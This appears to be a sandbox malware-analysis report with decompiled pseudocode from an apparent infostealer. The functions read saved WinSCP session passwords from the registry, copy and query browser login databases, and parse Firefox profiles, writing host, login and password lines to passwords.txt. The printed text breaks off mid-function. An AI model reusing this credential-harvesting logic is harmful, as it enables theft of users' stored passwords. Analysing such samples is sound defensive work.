                                                                                				 *((intOrPtr*)(_t188 - 0xdac)) = 0x400;
                                                                                				 *((intOrPtr*)(_t188 - 0xda0)) = 0x400;
                                                                                				if(RegOpenKeyExW(0x80000001, L"Software\\Martin Prikryl\\WinSCP 2\\Configuration", 0, 1, _t188 - 0xd90) != 0) {
                                                                                					L27:
                                                                                					return E00421A61(0, _t178, 0x80000001);
                                                                                				}
                                                                                				_push(_t188 - 0xdb8);
                                                                                				_push(_t188 - 0xda4);
                                                                                				_push(0);
                                                                                				_push(0x10);
                                                                                				_push(L"UseMasterPassword");
                                                                                				_push(L"Security");
                                                                                				_push( *(_t188 - 0xd90));
                                                                                				if( *0x44a0bc() != 0 &&  *(_t188 - 0xd90) != 0) {
                                                                                					RegCloseKey( *(_t188 - 0xd90));
                                                                                					 *(_t188 - 0xd90) = 0;
                                                                                				}
                                                                                				if( *((intOrPtr*)(_t188 - 0xda4)) == 0) {
                                                                                					L7:
                                                                                					if( *(_t188 - 0xd90) != 0) {
                                                                                						RegCloseKey( *(_t188 - 0xd90));
                                                                                						 *(_t188 - 0xd90) = 0;
                                                                                					}
                                                                                					L9:
                                                                                					if(RegOpenKeyExW(0x80000001, L"Software\\Martin Prikryl\\WinSCP 2\\Sessions", 0, 9, _t188 - 0xd90) != 0) {
                                                                                						goto L27;
                                                                                					}
                                                                                					if(RegEnumKeyExA( *(_t188 - 0xd90), 0, _t188 - 0x11c, _t188 - 0xd94, 0, 0, 0, 0) == 0) {
                                                                                						_t114 = E004037E9(_t188 - 0xd8c, L"passwords.txt");
                                                                                						__eflags =  *((intOrPtr*)(_t114 + 0x14)) - 8;
                                                                                						if( *((intOrPtr*)(_t114 + 0x14)) >= 8) {
                                                                                							_t114 =  *_t114;
                                                                                						}
                                                                                						_t115 = E0041E704(_t114, L"a+");
                                                                                						__eflags = 0;
                                                                                						_t185 = _t188 - 0xd8c;
                                                                                						 *((intOrPtr*)(_t188 - 0xd98)) = _t115;
                                                                                						E00403960(0, _t188 - 0xd8c, 1);
                                                                                						do {
                                                                                							_t180 =  *((intOrPtr*)(_t188 - 0xd98));
                                                                                							E0041E879(0, _t180, _t185, __eflags);
                                                                                							E0041E879(0, _t180, _t185, __eflags);
                                                                                							 *0x44a118( *(_t188 - 0xd90), _t188 - 0x11c, "HostName", 2, 0, _t188 - 0x51c, _t188 - 0xdb4, _t180, "Host: ", _t180, "Soft: WinSCP\n");
                                                                                							_t186 = "%s";
                                                                                							E0041E879(0, _t180, _t186, __eflags);
                                                                                							_t195 = _t193 + 0x1c;
                                                                                							 *((intOrPtr*)(_t188 - 0xdb0)) = 4;
                                                                                							__eflags =  *0x44a118( *(_t188 - 0xd90), _t188 - 0x11c, "PortNumber", 0xffff, 0, _t188 - 0xda8, _t188 - 0xdb0, _t180, _t186, _t188 - 0x51c);
                                                                                							if(__eflags != 0) {
                                                                                								_push(":22");
                                                                                								_push(_t180);
                                                                                								E0041E879(0, _t180, _t186, __eflags);
                                                                                							} else {
                                                                                								_push( *((intOrPtr*)(_t188 - 0xda8)));
                                                                                								_t155 = E00417463(0, _t188 - 0xd70, _t177, _t180, _t186, __eflags);
                                                                                								__eflags =  *((intOrPtr*)(_t155 + 0x14)) - 0x10;
                                                                                								if(__eflags >= 0) {
                                                                                									_t155 =  *_t155;
                                                                                								}
                                                                                								_push(_t155);
                                                                                								_push(":%s");
                                                                                								_push(_t180);
                                                                                								E0041E879(0, _t180, _t186, __eflags);
                                                                                								_t195 = _t195 + 0xc;
                                                                                								E00402C34(_t188 - 0xd70, 1, 0);
                                                                                							}
                                                                                							E0041E879(0, _t180, _t186, __eflags);
                                                                                							 *0x44a118( *(_t188 - 0xd90), _t188 - 0x11c, "UserName", 2, 0, _t188 - 0x91c, _t188 - 0xdac, _t180, "\nLogin: ");
                                                                                							E0041E879(0, _t180, _t186, __eflags);
                                                                                							_t196 = _t195 + 0xc;
                                                                                							 *((intOrPtr*)(_t188 - 0xd24)) = 0xf;
                                                                                							 *((intOrPtr*)(_t188 - 0xd28)) = 0;
                                                                                							 *((char*)(_t188 - 0xd38)) = 0;
                                                                                							 *(_t188 - 4) = 0;
                                                                                							 *0x44a118( *(_t188 - 0xd90), _t188 - 0x11c, "Password", 2, 0, _t188 - 0xd1c, _t188 - 0xda0, _t180, _t186, _t188 - 0x91c);
                                                                                							_t187 = E0041221B(0, _t188 - 0xd54, _t177, _t180, _t186, __eflags, _t188 - 0x51c, _t188 - 0x91c, _t188 - 0xd1c);
                                                                                							_t178 = _t188 - 0xd38;
                                                                                							 *(_t188 - 4) = 1;
                                                                                							E0040CFB8(_t178, _t144);
                                                                                							 *(_t188 - 4) = 0;
                                                                                							E00402C34(_t188 - 0xd54, 1, 0);
                                                                                							__eflags =  *((intOrPtr*)(_t188 - 0xd24)) - 0x10;
                                                                                							_t147 =  *((intOrPtr*)(_t188 - 0xd38));
                                                                                							if(__eflags < 0) {
                                                                                								_t147 = _t178;
                                                                                							}
                                                                                							_push(_t147);
                                                                                							_push("\nPassword: %s\n\n");
                                                                                							_push( *((intOrPtr*)(_t188 - 0xd98)));
                                                                                							E0041E879(0, _t178, _t187, __eflags);
                                                                                							_t193 = _t196 + 0xc;
                                                                                							 *(_t188 - 0xd9c) =  *(_t188 - 0xd9c) + 1;
                                                                                							 *(_t188 - 0xd94) = 0x104;
                                                                                							_t151 = RegEnumKeyExA( *(_t188 - 0xd90),  *(_t188 - 0xd9c), _t188 - 0x11c, _t188 - 0xd94, 0, 0, 0, 0);
                                                                                							 *(_t188 - 4) =  *(_t188 - 4) | 0xffffffff;
                                                                                							_t185 = _t151;
                                                                                							E00402C34(_t188 - 0xd38, 1, 0);
                                                                                							__eflags = _t151 - 0x103;
                                                                                						} while (__eflags != 0);
                                                                                						__eflags =  *(_t188 - 0xd90);
                                                                                						if(__eflags != 0) {
                                                                                							RegCloseKey( *(_t188 - 0xd90));
                                                                                							 *(_t188 - 0xd90) = 0;
                                                                                						}
                                                                                						_push( *((intOrPtr*)(_t188 - 0xd98)));
                                                                                						E0041EAA2(0, _t178, _t185, __eflags);
                                                                                						goto L27;
                                                                                					}
                                                                                					if( *(_t188 - 0xd90) != 0) {
                                                                                						RegCloseKey( *(_t188 - 0xd90));
                                                                                					}
                                                                                					goto L27;
                                                                                				}
                                                                                				if( *(_t188 - 0xd90) == 0) {
                                                                                					goto L9;
                                                                                				}
                                                                                				RegCloseKey( *(_t188 - 0xd90));
                                                                                				 *(_t188 - 0xd90) = 0;
                                                                                				goto L7;
                                                                                			}
















                                                                                0x004128ea
                                                                                0x004128ef
                                                                                0x00412918
                                                                                0x00412928
                                                                                0x0041292a
                                                                                0x00412964
                                                                                0x00412969
                                                                                0x0041296a
                                                                                0x0041292c
                                                                                0x0041292c
                                                                                0x00412938
                                                                                0x0041293d
                                                                                0x00412941
                                                                                0x00412943
                                                                                0x00412943
                                                                                0x00412945
                                                                                0x00412946
                                                                                0x0041294b
                                                                                0x0041294c
                                                                                0x00412951
                                                                                0x0041295d
                                                                                0x0041295d
                                                                                0x00412977
                                                                                0x004129a1
                                                                                0x004129b0
                                                                                0x004129b5
                                                                                0x004129b8
                                                                                0x004129c2
                                                                                0x004129c8
                                                                                0x004129eb
                                                                                0x004129f4
                                                                                0x00412a1a
                                                                                0x00412a1c
                                                                                0x00412a22
                                                                                0x00412a26
                                                                                0x00412a34
                                                                                0x00412a37
                                                                                0x00412a3c
                                                                                0x00412a43
                                                                                0x00412a49
                                                                                0x00412a4b
                                                                                0x00412a4b
                                                                                0x00412a4d
                                                                                0x00412a4e
                                                                                0x00412a53
                                                                                0x00412a59
                                                                                0x00412a5e
                                                                                0x00412a61
                                                                                0x00412a7f
                                                                                0x00412a8f
                                                                                0x00412a95
                                                                                0x00412aa2
                                                                                0x00412aa4
                                                                                0x00412aa9
                                                                                0x00412aa9
                                                                                0x00412ab5
                                                                                0x00412abb
                                                                                0x00412ac3
                                                                                0x00412ac9
                                                                                0x00412ac9
                                                                                0x00412acf
                                                                                0x00412ad5
                                                                                0x00000000
                                                                                0x00412ada
                                                                                0x00412843
                                                                                0x0041284f
                                                                                0x0041284f
                                                                                0x00000000
                                                                                0x00412843
                                                                                0x004127ce
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004127d6
                                                                                0x004127dc
                                                                                0x00000000

                                                                                APIs
                                                                                • __EH_prolog3_GS.LIBCMT ref: 004126C7
                                                                                • _memset.LIBCMT ref: 004126E7
                                                                                • _memset.LIBCMT ref: 0041270D
                                                                                • _memset.LIBCMT ref: 00412724
                                                                                • _memset.LIBCMT ref: 0041273B
                                                                                • RegOpenKeyExW.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?,?,?,?,?,?,?,?,00000000,000003FF,\Opera GX Stable\,?), ref: 0041276D
                                                                                • RegGetValueW.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,?,?,?,?,?,?,?,?,00000000,000003FF), ref: 0041279C
                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,00000000,000003FF,\Opera GX Stable\,?,\Opera Stable\), ref: 004127B4
                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,00000000,000003FF,\Opera GX Stable\,?,\Opera Stable\), ref: 004127D6
                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,00000000,000003FF,\Opera GX Stable\,?,\Opera Stable\), ref: 004127F0
                                                                                • RegOpenKeyExW.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?,?,?,?,?,?,?,?,00000000,000003FF,\Opera GX Stable\,?), ref: 0041280C
                                                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00412833
                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,00000000,000003FF,\Opera GX Stable\,?,\Opera Stable\), ref: 0041284F
                                                                                • _fprintf.LIBCMT ref: 004128A0
                                                                                • _fprintf.LIBCMT ref: 004128AB
                                                                                • RegGetValueA.ADVAPI32(?,?,HostName,00000002,00000000,?,?,?,?,00000001,passwords.txt), ref: 004128D6
                                                                                • _fprintf.LIBCMT ref: 004128EA
                                                                                • RegGetValueA.ADVAPI32 ref: 00412922
                                                                                • _fprintf.LIBCMT ref: 0041294C
                                                                                • _fprintf.LIBCMT ref: 0041296A
                                                                                • _fprintf.LIBCMT ref: 00412977
                                                                                • RegGetValueA.ADVAPI32(?,?,UserName,00000002,00000000,?,?), ref: 004129A1
                                                                                • _fprintf.LIBCMT ref: 004129B0
                                                                                • RegGetValueA.ADVAPI32(?,?,Password,00000002,00000000,?,?), ref: 004129F4
                                                                                  • Part of subcall function 0041221B: __EH_prolog3.LIBCMT ref: 00412234
                                                                                  • Part of subcall function 0041221B: GetProcessHeap.KERNEL32(00000008,?,?,?,00000028), ref: 0041228F
                                                                                  • Part of subcall function 0041221B: HeapAlloc.KERNEL32(00000000), ref: 00412296
                                                                                  • Part of subcall function 0041221B: GetProcessHeap.KERNEL32(00000000,?), ref: 004122AC
                                                                                  • Part of subcall function 0041221B: HeapFree.KERNEL32(00000000), ref: 004122B3
                                                                                  • Part of subcall function 0040CFB8: _memmove.LIBCMT ref: 0040CFD4
                                                                                  • Part of subcall function 00402C34: _memmove.LIBCMT ref: 00402C53
                                                                                • _fprintf.LIBCMT ref: 00412A59
                                                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00412A8F
                                                                                • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00412AC3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _fprintf$CloseValue$Heap_memset$EnumOpenProcess_memmove$AllocFreeH_prolog3H_prolog3_
                                                                                • String ID: Login: $Password: %s$:%s$:22$Host: $HostName$Password$PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
                                                                                • API String ID: 61070830-1600676177
                                                                                • Opcode ID: b701ba94452cc774ee41efd4a3fa54942812168d8ddb2898d493336c28fa7959
                                                                                • Instruction ID: c6a946c8e662e18cfefa1c2ea30f102adf18462cd55a2cbc4d69bf1881fb66e2
                                                                                • Opcode Fuzzy Hash: b701ba94452cc774ee41efd4a3fa54942812168d8ddb2898d493336c28fa7959
                                                                                • Instruction Fuzzy Hash: 49B10AB194022CAEEB209B91DC86FEABB7DEF05344F0000EBB508A2151D7786FD58F65
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 39%
                                                                                			E0040FA8E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                				void* _t69;
                                                                                				void* _t74;
                                                                                				void* _t78;
                                                                                				intOrPtr _t80;
                                                                                				intOrPtr _t81;
                                                                                				void* _t83;
                                                                                				intOrPtr _t85;
                                                                                				void* _t95;
                                                                                				intOrPtr* _t96;
                                                                                				void* _t101;
                                                                                				void* _t102;
                                                                                				void* _t111;
                                                                                				intOrPtr* _t112;
                                                                                				intOrPtr _t115;
                                                                                				void* _t141;
                                                                                				CHAR* _t160;
                                                                                				char* _t161;
                                                                                				void* _t162;
                                                                                				void* _t163;
                                                                                				void* _t164;
                                                                                				void* _t167;
                                                                                
                                                                                				_t158 = __edi;
                                                                                				_t114 = __ebx;
                                                                                				E004219DE(E00436710, __ebx, __edi, __esi);
                                                                                				 *((intOrPtr*)(_t162 - 0x184)) =  *((intOrPtr*)(_t162 + 8));
                                                                                				 *((intOrPtr*)(_t162 - 0x178)) =  *((intOrPtr*)(_t162 + 0xc));
                                                                                				 *((intOrPtr*)(_t162 - 0x174)) =  *((intOrPtr*)(_t162 + 0x10));
                                                                                				_t160 = __ecx;
                                                                                				GetCurrentDirectoryA(0x104, _t162 - 0x118);
                                                                                				 *0x44a1b8(_t162 - 0x118, "\\temp", 0x180);
                                                                                				CopyFileA(_t160, _t162 - 0x118, 1);
                                                                                				_t161 =  *0x449db4; // 0x147e650
                                                                                				_t69 =  *0x44a0a4(_t162 - 0x118, _t162 - 0x188);
                                                                                				if(_t69 == 0) {
                                                                                					_t74 =  *0x44a058( *((intOrPtr*)(_t162 - 0x188)), _t161, 0xffffffff, _t162 - 0x170, _t69);
                                                                                					_t164 = _t163 + 0x14;
                                                                                					if(_t74 == 0) {
                                                                                						_t158 = E00420300( *0x449f3c, "a+");
                                                                                						if(_t158 != 0) {
                                                                                							_t78 =  *0x44a074( *((intOrPtr*)(_t162 - 0x170)));
                                                                                							_t174 = _t78 - 0x64;
                                                                                							if(_t78 == 0x64) {
                                                                                								_t161 = "\n";
                                                                                								do {
                                                                                									_t80 =  *0x44a094( *((intOrPtr*)(_t162 - 0x170)), 0);
                                                                                									 *((intOrPtr*)(_t162 - 0x180)) = _t80;
                                                                                									_t81 =  *0x44a094( *((intOrPtr*)(_t162 - 0x170)), 1);
                                                                                									_t164 = _t164 + 0x10;
                                                                                									 *((intOrPtr*)(_t162 - 0x17c)) = _t81;
                                                                                									_t83 =  *0x44a088( *((intOrPtr*)(_t162 - 0x170)), 2,  *0x44a080( *((intOrPtr*)(_t162 - 0x170)), 2,  *((intOrPtr*)(_t162 - 0x178))));
                                                                                									_t115 = _t162 - 0x134;
                                                                                									E0040F94A(_t115,  *((intOrPtr*)(_t162 - 0x174)), _t83, _t158, _t161, _t174);
                                                                                									 *(_t162 - 4) =  *(_t162 - 4) & 0x00000000;
                                                                                									_t85 =  *((intOrPtr*)(_t162 - 0x134));
                                                                                									if( *((intOrPtr*)(_t162 - 0x120)) < 0x10) {
                                                                                										_t85 = _t115;
                                                                                									}
                                                                                									_t114 = 0x43e028;
                                                                                									_push(0x43e028);
                                                                                									_push(_t85);
                                                                                									if( *0x44a1d8() != 0) {
                                                                                										E0041E879(0x43e028, _t158, _t161, __eflags);
                                                                                										E0041E879(0x43e028, _t158, _t161, __eflags);
                                                                                										E0041E879(_t114, _t158, _t161, __eflags);
                                                                                										E0041E879(_t114, _t158, _t161, __eflags);
                                                                                										E0041E879(_t114, _t158, _t161, __eflags);
                                                                                										E0041E879(_t114, _t158, _t161, __eflags);
                                                                                										_t167 = _t164 + 0x3c;
                                                                                										E0041E879(_t114, _t158, _t161, __eflags);
                                                                                										_t95 =  *0x44a088( *((intOrPtr*)(_t162 - 0x170)), 2,  *0x44a080( *((intOrPtr*)(_t162 - 0x170)), 2,  *((intOrPtr*)(_t162 - 0x178)), _t158, _t161, _t158, "Login: %s",  *((intOrPtr*)(_t162 - 0x17c)), _t158, _t161, _t158, "Host: %s",  *((intOrPtr*)(_t162 - 0x180)), _t158, _t161, _t158, "Soft: %s",  *((intOrPtr*)(_t162 - 0x184)), _t158, _t161));
                                                                                										_t114 = _t162 - 0x150;
                                                                                										_t96 = E0040F94A(_t162 - 0x150,  *((intOrPtr*)(_t162 - 0x174)), _t95, _t158, _t161, __eflags);
                                                                                										__eflags =  *((intOrPtr*)(_t96 + 0x14)) - 0x10;
                                                                                										if(__eflags >= 0) {
                                                                                											_t96 =  *_t96;
                                                                                										}
                                                                                										_push(_t96);
                                                                                										_push("Password: %s");
                                                                                										_push(_t158);
                                                                                										E0041E879(_t114, _t158, _t161, __eflags);
                                                                                										_t141 = _t162 - 0x150;
                                                                                										goto L15;
                                                                                									} else {
                                                                                										_t102 =  *0x44a1d8( *((intOrPtr*)(_t162 - 0x17c)), 0x43e028);
                                                                                										_t177 = _t102;
                                                                                										if(_t102 != 0) {
                                                                                											E0041E879(0x43e028, _t158, _t161, _t177);
                                                                                											E0041E879(0x43e028, _t158, _t161, _t177);
                                                                                											E0041E879(_t114, _t158, _t161, _t177);
                                                                                											E0041E879(_t114, _t158, _t161, _t177);
                                                                                											E0041E879(_t114, _t158, _t161, _t177);
                                                                                											E0041E879(_t114, _t158, _t161, _t177);
                                                                                											_t167 = _t164 + 0x3c;
                                                                                											E0041E879(_t114, _t158, _t161, _t177);
                                                                                											_t111 =  *0x44a088( *((intOrPtr*)(_t162 - 0x170)), 2,  *0x44a080( *((intOrPtr*)(_t162 - 0x170)), 2,  *((intOrPtr*)(_t162 - 0x178)), _t158, _t161, _t158, "Login: %s",  *((intOrPtr*)(_t162 - 0x17c)), _t158, _t161, _t158, "Host: %s",  *((intOrPtr*)(_t162 - 0x180)), _t158, _t161, _t158, "Soft: %s",  *((intOrPtr*)(_t162 - 0x184)), _t158, _t161));
                                                                                											_t114 = _t162 - 0x16c;
                                                                                											_t112 = E0040F94A(_t162 - 0x16c,  *((intOrPtr*)(_t162 - 0x174)), _t111, _t158, _t161, _t177);
                                                                                											_t178 =  *((intOrPtr*)(_t112 + 0x14)) - 0x10;
                                                                                											if( *((intOrPtr*)(_t112 + 0x14)) >= 0x10) {
                                                                                												_t112 =  *_t112;
                                                                                											}
                                                                                											_push(_t112);
                                                                                											_push("Password: %s");
                                                                                											_push(_t158);
                                                                                											E0041E879(_t114, _t158, _t161, _t178);
                                                                                											_t141 = _t162 - 0x16c;
                                                                                											L15:
                                                                                											_t164 = _t167 + 0xc;
                                                                                											E00402C34(_t141, 1, 0);
                                                                                											_push("\n\n");
                                                                                											_push(_t158);
                                                                                											E0041E879(_t114, _t158, _t161, _t178);
                                                                                										}
                                                                                									}
                                                                                									 *(_t162 - 4) =  *(_t162 - 4) | 0xffffffff;
                                                                                									E00402C34(_t162 - 0x134, 1, 0);
                                                                                									_t101 =  *0x44a074( *((intOrPtr*)(_t162 - 0x170)));
                                                                                									_t179 = _t101 - 0x64;
                                                                                								} while (_t101 == 0x64);
                                                                                							}
                                                                                							_push(_t158);
                                                                                							E0041EAA2(_t114, _t158, _t161, _t179);
                                                                                						}
                                                                                					}
                                                                                					 *0x44a078( *((intOrPtr*)(_t162 - 0x170)));
                                                                                					 *0x44a0a8( *((intOrPtr*)(_t162 - 0x188)));
                                                                                				}
                                                                                				DeleteFileA(_t162 - 0x118);
                                                                                				return E00421A61(_t114, _t158, _t161);
                                                                                			}

























                                                                                APIs
                                                                                • __EH_prolog3_GS.LIBCMT ref: 0040FA98
                                                                                • GetCurrentDirectoryA.KERNEL32(00000104,?,00000180,00410FDE,?,?,?), ref: 0040FAC6
                                                                                • lstrcat.KERNEL32(?,\temp), ref: 0040FAD8
                                                                                • CopyFileA.KERNEL32 ref: 0040FAE8
                                                                                • DeleteFileA.KERNEL32(?,00000001), ref: 0040FDE0
                                                                                  • Part of subcall function 00420300: __fsopen.LIBCMT ref: 0042030D
                                                                                  • Part of subcall function 0040F94A: __EH_prolog3_GS.LIBCMT ref: 0040F951
                                                                                  • Part of subcall function 0040F94A: _memset.LIBCMT ref: 0040F99F
                                                                                  • Part of subcall function 0040F94A: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,00000074,00410302), ref: 0040F9DA
                                                                                • StrCmpCA.SHLWAPI(?,0043E028), ref: 0040FBEE
                                                                                • StrCmpCA.SHLWAPI(?,0043E028), ref: 0040FC03
                                                                                • _fprintf.LIBCMT ref: 0040FC13
                                                                                • _fprintf.LIBCMT ref: 0040FC24
                                                                                • _fprintf.LIBCMT ref: 0040FC2E
                                                                                • _fprintf.LIBCMT ref: 0040FC3F
                                                                                • _fprintf.LIBCMT ref: 0040FC49
                                                                                • _fprintf.LIBCMT ref: 0040FC5A
                                                                                • _fprintf.LIBCMT ref: 0040FC64
                                                                                • _fprintf.LIBCMT ref: 0040FCB6
                                                                                • _fprintf.LIBCMT ref: 0040FCC8
                                                                                • _fprintf.LIBCMT ref: 0040FCD9
                                                                                  • Part of subcall function 0041E879: __lock_file.LIBCMT ref: 0041E8C0
                                                                                  • Part of subcall function 0041E879: __stbuf.LIBCMT ref: 0041E944
                                                                                  • Part of subcall function 0041E879: __output_l.LIBCMT ref: 0041E954
                                                                                  • Part of subcall function 0041E879: __ftbuf.LIBCMT ref: 0041E95E
                                                                                • _fprintf.LIBCMT ref: 0040FCE3
                                                                                • _fprintf.LIBCMT ref: 0040FCF4
                                                                                • _fprintf.LIBCMT ref: 0040FCFE
                                                                                • _fprintf.LIBCMT ref: 0040FD0F
                                                                                • _fprintf.LIBCMT ref: 0040FD19
                                                                                • _fprintf.LIBCMT ref: 0040FD6B
                                                                                • _fprintf.LIBCMT ref: 0040FD88
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _fprintf$FileH_prolog3_$AllocCopyCurrentDeleteDirectoryLocal__fsopen__ftbuf__lock_file__output_l__stbuf_memsetlstrcat
                                                                                • String ID: (C$Host: %s$Login: %s$Password: %s$Soft: %s$\temp$hC
                                                                                • API String ID: 162908412-3837908046
                                                                                • Opcode ID: 4e07b95e7a7402d66babf50e722e62238adf2f93084dbe4384c26c2d9dcea29d
                                                                                • Instruction ID: b771211359e168c9327bb717ff6b7cafefa7b7b209b9c1f12ec4e90bf366e63d
                                                                                • Opcode Fuzzy Hash: 4e07b95e7a7402d66babf50e722e62238adf2f93084dbe4384c26c2d9dcea29d
                                                                                • Instruction Fuzzy Hash: 1F81E035944218BFEB256B22DC0AFEE7778EF09314F5040BBF409A20A1DF395E949E59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 42%
                                                                                			E0041078A(CHAR* __ecx, void* __edx) {
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				void* __ebp;
                                                                                				signed int _t32;
                                                                                				void* _t46;
                                                                                				void* _t57;
                                                                                				void* _t63;
                                                                                				void* _t70;
                                                                                				void* _t78;
                                                                                				void* _t80;
                                                                                				void* _t81;
                                                                                				void* _t93;
                                                                                				void* _t94;
                                                                                				void* _t95;
                                                                                				void* _t104;
                                                                                				CHAR* _t105;
                                                                                				void* _t106;
                                                                                				intOrPtr _t107;
                                                                                				char* _t108;
                                                                                				signed int _t109;
                                                                                				void* _t111;
                                                                                				void* _t112;
                                                                                				void* _t114;
                                                                                				void* _t115;
                                                                                
                                                                                				_t93 = __edx;
                                                                                				_t109 = _t111 - 0x1094;
                                                                                				E00430D40(0x1114);
                                                                                				_t32 =  *0x447674; // 0x4124c941
                                                                                				 *(_t109 + 0x1090) = _t32 ^ _t109;
                                                                                				 *((intOrPtr*)(_t109 - 0x80)) =  *((intOrPtr*)(_t109 + 0x109c));
                                                                                				_t105 = __ecx;
                                                                                				 *0x44a1a8(0, 0x1a, 0, 0, _t109 + 0xf8c, _t104, _t78);
                                                                                				E0041FF3A(__ecx, 4, "%s\\Mozilla\\Firefox\\profiles.ini", _t109 + 0xf8c);
                                                                                				_t112 = _t111 + 0x10;
                                                                                				GetPrivateProfileSectionNamesA(_t109 - 0x74, 0x1000, _t105);
                                                                                				_push(_t105);
                                                                                				if( *0x44a090() == 0) {
                                                                                					_push(0x44a060);
                                                                                					if(E0041F2F3() < 0x20) {
                                                                                						_push(0);
                                                                                						_t107 = E00420300(E0040F445(_t105,  *0x44a034), "r");
                                                                                						_t114 = _t112 + 0x14;
                                                                                						 *((intOrPtr*)(_t109 - 0x7c)) = _t107;
                                                                                						_t120 = _t107;
                                                                                						if(_t107 != 0) {
                                                                                							_push(_t94);
                                                                                							_push(2);
                                                                                							_push(0);
                                                                                							_push(_t107);
                                                                                							E00420BEA(0, _t93, _t94, _t107, _t120);
                                                                                							_push(_t107);
                                                                                							_t46 = E00420A4E(0, _t94, _t107, _t120);
                                                                                							_push(0);
                                                                                							_push(0);
                                                                                							_push(_t107);
                                                                                							_t95 = _t46;
                                                                                							E00420BEA(0, _t93, _t95, _t107, _t120);
                                                                                							_t9 = _t95 + 1; // 0x1
                                                                                							 *((intOrPtr*)(_t109 - 0x78)) = E0041D474(0, _t93, _t95, _t107, _t120, _t9);
                                                                                							E00420657(_t49, 1, _t95, _t107);
                                                                                							_t81 = E00420300( *0x449f3c, "a+");
                                                                                							_t115 = _t114 + 0x38;
                                                                                							if(_t81 != 0) {
                                                                                								_t95 = E0041E5C0( *((intOrPtr*)(_t109 - 0x78)),  *0x449c10);
                                                                                								_t122 = _t95;
                                                                                								if(_t95 != 0) {
                                                                                									_t108 = "\n";
                                                                                									do {
                                                                                										_t13 = lstrlenA( *0x449c10) + 3; // 0x3
                                                                                										 *((intOrPtr*)(_t109 - 0x78)) = _t95 + _t13;
                                                                                										_t57 = E0041E5C0(_t95 + _t13,  *0x449d78);
                                                                                										_t96 = _t57;
                                                                                										_push(_t108);
                                                                                										_push(_t81);
                                                                                										 *((char*)(_t57 - 3)) = 0;
                                                                                										E0041E879(_t81, _t57, _t108, _t122);
                                                                                										_push( *((intOrPtr*)(_t109 - 0x80)));
                                                                                										_push("Soft: %s");
                                                                                										_push(_t81);
                                                                                										E0041E879(_t81, _t57, _t108, _t122);
                                                                                										_push(_t108);
                                                                                										_push(_t81);
                                                                                										E0041E879(_t81, _t57, _t108, _t122);
                                                                                										_push( *((intOrPtr*)(_t109 - 0x78)));
                                                                                										_push("Host: %s");
                                                                                										_push(_t81);
                                                                                										E0041E879(_t81, _t57, _t108, _t122);
                                                                                										_push(_t108);
                                                                                										_push(_t81);
                                                                                										E0041E879(_t81, _t57, _t108, _t122);
                                                                                										_t63 = E0041E5C0(_t96 + 0xfffffffe,  *0x449ec8);
                                                                                										 *((intOrPtr*)(_t109 - 0x78)) = lstrlenA( *0x449ec8) + _t63 + 3;
                                                                                										 *((char*)(E0041E5C0(lstrlenA( *0x449ec8) + _t63 + 3,  *0x449ec4) - 3)) = 0;
                                                                                										_push(E0040F4BC( *((intOrPtr*)(_t109 - 0x78)), _t93));
                                                                                										_push("Login: %s");
                                                                                										_push(_t81);
                                                                                										E0041E879(_t81, _t66, _t108, _t122);
                                                                                										_push(_t108);
                                                                                										_push(_t81);
                                                                                										E0041E879(_t81, _t66, _t108, _t122);
                                                                                										_t70 = E0041E5C0(_t66 + 0xfffffffe,  *0x449ec4);
                                                                                										 *((intOrPtr*)(_t109 - 0x78)) = lstrlenA( *0x449ec4) + _t70 + 3;
                                                                                										 *((char*)(E0041E5C0(lstrlenA( *0x449ec4) + _t70 + 3,  *0x449fbc) - 3)) = 0;
                                                                                										_push(E0040F4BC( *((intOrPtr*)(_t109 - 0x78)), _t93));
                                                                                										_push("Password: %s");
                                                                                										_push(_t81);
                                                                                										E0041E879(_t81, _t73, _t108, _t122);
                                                                                										_push("\n\n");
                                                                                										_push(_t81);
                                                                                										E0041E879(_t81, _t73, _t108, _t122);
                                                                                										_t95 = E0041E5C0(_t73 + 0xfffffffe,  *0x449c10);
